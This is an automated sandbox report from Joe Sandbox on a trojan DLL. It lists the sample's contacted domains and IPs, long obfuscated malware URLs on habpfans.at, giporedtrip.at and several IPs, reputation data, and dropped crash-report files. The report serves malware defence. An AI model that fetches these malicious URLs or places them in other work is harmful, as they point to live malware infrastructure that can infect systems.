http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk	100%	Avira URL Cloud	malware
http://194.76.226.200/drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk	0%	Avira URL Cloud	safe
http://194.76.226.200/drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk	0%	Avira URL Cloud	safe
http://habpfans.at/	100%	Avira URL Cloud	malware
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w	100%	Avira URL Cloud	malware
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk	0%	Avira URL Cloud	safe
http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk	100%	Avira URL Cloud	malware
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8	0%	Avira URL Cloud	safe
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk	100%	Avira URL Cloud	malware
http://31.214.157.187/	0%	Avira URL Cloud	safe
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/	100%	Avira URL Cloud	malware
http://habpfans.at/g	100%	Avira URL Cloud	malware
http://194214.157.187/	0%	Avira URL Cloud	safe
http://www.dhtmlcentral.com/tutorial.asp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
giporedtrip.at	211.119.84.112	true	true	12%, Virustotal, Browse	unknown
habpfans.at	41.41.255.235	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://31.214.157.187/drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk	true	Avira URL Cloud: safe	unknown
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk	true	Avira URL Cloud: malware	unknown
http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk	true	Avira URL Cloud: malware	unknown
http://194.76.226.200/drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk	true	Avira URL Cloud: safe	unknown
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk	true	Avira URL Cloud: safe	unknown
http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk	true	Avira URL Cloud: malware	unknown
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus	loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://habpfans.at/	loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w	loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8	loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.214.157.187/	loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/	loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://habpfans.at/g	loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://194214.157.187/	loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.dhtmlcentral.com/tutorial.asp	loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
181.129.180.251	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
41.41.255.235	habpfans.at	Egypt	8452	TE-ASTE-ASEG	true
211.119.84.112	giporedtrip.at	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
31.214.157.187	unknown	Germany	58329	RACKPLACEDE	true
61.36.14.230	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
194.76.226.200	unknown	Germany	39378	SERVINGADE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	560543
Start date:	26.01.2022
Start time:	17:02:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hFGZpat9Mf.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@6/6@4/7
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 94.6% (good quality ratio 93.1%) Quality average: 83.4% Quality standard deviation: 23.8%
HCA Information:	Successful, ratio: 94% Number of executed functions: 25 Number of non-executed functions: 149
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 104.208.16.94, 13.107.43.16
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, l-0007.dc-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:03:26	API Interceptor	12x Sleep call for process: loaddll32.exe modified
17:03:34	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
181.129.180.251	POOA3yOX9U.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	ZmrIkplkoM.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	u5Xy31KyGy.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	q7xmnTDHpF.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	i8o6qTTaCn.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	mmL6PoOcBh.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	RO5C8I46uy.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	f6Y6Q3u1yu.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	fd862143z1.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	Vy8zkg8z8Z.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	jPda372R5f.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	IoF1dw1p9z.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	av7K0AcNsr.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	4EpcouxNoq.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	pgOVV6yBlF.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	uATT8vAUK9.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	vjdcYcI4Y2.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	7h6Fk08DNQ.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	N6y7A7R9wg.exe	Get hash	malicious	Browse	srtuiyhuali.at/
	dLXl5wO1SJ.exe	Get hash	malicious	Browse	srtuiyhuali.at/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
giporedtrip.at	61ee6edf7de65.dll	Get hash	malicious	Browse	91.203.174.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TE-ASTE-ASEG	DDYw4c9rsv	Get hash	malicious	Browse	41.38.213.218
	3TwimyN0N8	Get hash	malicious	Browse	41.37.180.30
	UnHAnaAW.arm7	Get hash	malicious	Browse	41.37.180.82
	UnHAnaAW.x86	Get hash	malicious	Browse	41.32.98.110
	LK5ARQg60H	Get hash	malicious	Browse	197.33.36.99
	keLazmLrKu	Get hash	malicious	Browse	197.60.156.38
	CoA2abf5vX	Get hash	malicious	Browse	41.44.233.248
	34jU7VJQ0a	Get hash	malicious	Browse	197.39.177.17
	uVZuoZ6LRI	Get hash	malicious	Browse	156.208.176.40
	l6RBb7Hfo8	Get hash	malicious	Browse	197.59.229.17
	y12n2LSmXR	Get hash	malicious	Browse	197.44.77.166
	Tsunami.arm7	Get hash	malicious	Browse	41.239.218.32
	Tsunami.x86	Get hash	malicious	Browse	41.44.233.228
	meerkat.ppc	Get hash	malicious	Browse	41.233.132.81
	7ihH3gfA8T.exe	Get hash	malicious	Browse	41.41.255.235
	Jl0usXeboX	Get hash	malicious	Browse	41.239.218.71
	GhEbenpQOu	Get hash	malicious	Browse	156.223.192.120
	fB3EW65a8w	Get hash	malicious	Browse	197.33.36.75
	UUdqNnOR8m	Get hash	malicious	Browse	41.36.251.34
	h7hCeBAb8l	Get hash	malicious	Browse	41.36.100.75
EPMTelecomunicacionesSAESPCO	w9iS7q4EwN	Get hash	malicious	Browse	201.184.41.22
	Jl0usXeboX	Get hash	malicious	Browse	181.136.190.136
	ur2NHPuTBS	Get hash	malicious	Browse	181.134.69.202
	ZYXESmYwdx	Get hash	malicious	Browse	181.133.99.212
	GhEbenpQOu	Get hash	malicious	Browse	181.134.69.226
	5n6bA6wC1D	Get hash	malicious	Browse	181.128.127.203
	jJboHgATMC	Get hash	malicious	Browse	181.129.241.192
	fB3EW65a8w	Get hash	malicious	Browse	181.128.127.245
	h7hCeBAb8l	Get hash	malicious	Browse	190.70.172.240
	3rR7qVHNMH	Get hash	malicious	Browse	201.233.201.67
	V15hQSZlC3	Get hash	malicious	Browse	190.128.73.12
	#U3061#U3066#U3082#U3064#U305f#U3044#U30c1#U3059#U30b8.exe	Get hash	malicious	Browse	200.116.199.10
	78Z6MfiA8T	Get hash	malicious	Browse	190.29.50.130
	arm	Get hash	malicious	Browse	181.128.175.112
	Y9uHYfBuu4	Get hash	malicious	Browse	201.184.28.58
	aqby7XXUj0	Get hash	malicious	Browse	181.138.92.45
	hc0B1CYKcL	Get hash	malicious	Browse	201.190.124.238
	nF2HOER8Fg	Get hash	malicious	Browse	201.233.47.198
	3cNKO2pP2l	Get hash	malicious	Browse	181.138.79.59
	koyDvhDnUj	Get hash	malicious	Browse	181.129.52.110

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_11720b30\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9231380421791202
Encrypted:	false
SSDEEP:	192:dSiB0oXKHBUZMX4jed+tTN/u7slS274ItWc:civXiBUZMX4jeI5/u7slX4ItWc
MD5:	2E9E475BBF5C444FDD216D612789DF16
SHA1:	962AD3179B750CF580262E1907A21695CCCF95CA
SHA-256:	0064278D09AABB28FEDAF0249EA8CB8FE70CA1E041D4894DCF53040F05E19E31
SHA-512:	18EBA813F6A28E2B7751BD3001B4482C544F808182C859505F4FBFDC25EAAA2F687261D01906D9337561C1D8F0E8ACC7BD71C9A5A2211592E1F48E8D3637A661
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.7.7.1.8.9.9.3.2.8.3.8.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.7.7.1.9.0.1.2.5.8.0.7.2.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.3.8.9.6.b.0.-.5.3.f.3.-.4.c.c.7.-.8.1.1.7.-.7.c.f.5.a.2.3.c.6.8.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.e.b.9.5.e.c.-.d.e.6.2.-.4.7.8.9.-.9.a.2.7.-.4.9.f.7.3.2.8.d.6.c.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.c.8.-.0.0.0.1.-.0.0.1.6.-.2.4.9.8.-.9.3.a.3.1.9.1.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jan 27 01:03:17 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	50394
Entropy (8bit):	2.1230258138964713
Encrypted:	false
SSDEEP:	192:v7u7354xKvI2O5Skb+XKD74zz7hFK/dDBRvU0SF9Dq0Awi/Y4p:/oQB5Lb+XKIzz7hFadDBR8xFpq0Awi/
MD5:	E557B9E94120C75B30455B3AB7BB4F67
SHA1:	2816C199A296B247FADBC24CB7248059CC2AA728
SHA-256:	A0FB0FDB2F46849AE8FFCCB0F6830134282C4BEF5375EC4B3328CA9957E8FC78
SHA-512:	1B07B0D1CC742AB0398A7C0CF12C6A6D4AD57568006FC2B39D05E84E9B93F969C117C21CCF5CC366B21403FCE10D970DE56DAA1951B4037F3A93066D91297D33
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......U..a....................................d..../..........T.......8...........T...........@...............`...........L....................................................................U...........B..............GenuineIntelW...........T...........H..a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5399.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8312
Entropy (8bit):	3.6976983898128415
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNips6rRf+Z46YBgah6TgmfTNSOCprR689bW4sfcSm:RrlsNiy6Ff246YBb6TgmfTNSHDWrfI
MD5:	1F0DCAF8CAD8216C2681E359FDB9FC32
SHA1:	F83B65FE0F97B36C53DEA67EF86D390C5F2E4874
SHA-256:	C48C34B58275C8586BA05F0DE058403E5D4BEF7A7489275B5971858A1B1B65DA
SHA-512:	3B02715FD729AA52FA2738D709F4B09EA244329D1CD8A1FAED420EE2A0A87085BE984ABD38EC3BDF61C2A0D0A5DFCA9640331E596FE7971D8009FF0C5E986BD9
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.7.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6656.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4670
Entropy (8bit):	4.493943117199789
Encrypted:	false
SSDEEP:	48:cvIwSD8zs8JgtWI9A2VWSC8BVs8fm8M4JCdszZFAV+q8/OD0yx4SrS1d:uITf632kSNXRJRUVt0iDW1d
MD5:	0126F95A901429A83B8D25CA87CD378F
SHA1:	B291C283CF80A9811F1EA5703267243116199DDD
SHA-256:	507F8842DAC1704D0AF596840F0F75862C0CEC375118DCBDC55ED85F1D39E175
SHA-512:	6D3D54EE263306831C43EB89F8246689251F0E293ABB94C3E5F63E658D95274E665B774CEB35CD1BB8A8E74F10FE749C0B5315E26085DC76BFC232DBED680EEC
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1359974" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.2638646695109035
Encrypted:	false
SSDEEP:	12288:MLR2cbZ/FPLJ86W9cwmTJw4qNsIbc65wppMcGFtz3OUkB8lA6LD6y7Rt:sR2cbZ/FPLJ86W9yqYKt
MD5:	35049590C5CC406E8B91A1B0B5092584
SHA1:	B8ACCA4CFDD281BC793D177261B5A769CAE049C3
SHA-256:	B84991E6386C563D75788B986DA5381F88A5EA41408DD98DA31B8E2C4755528A
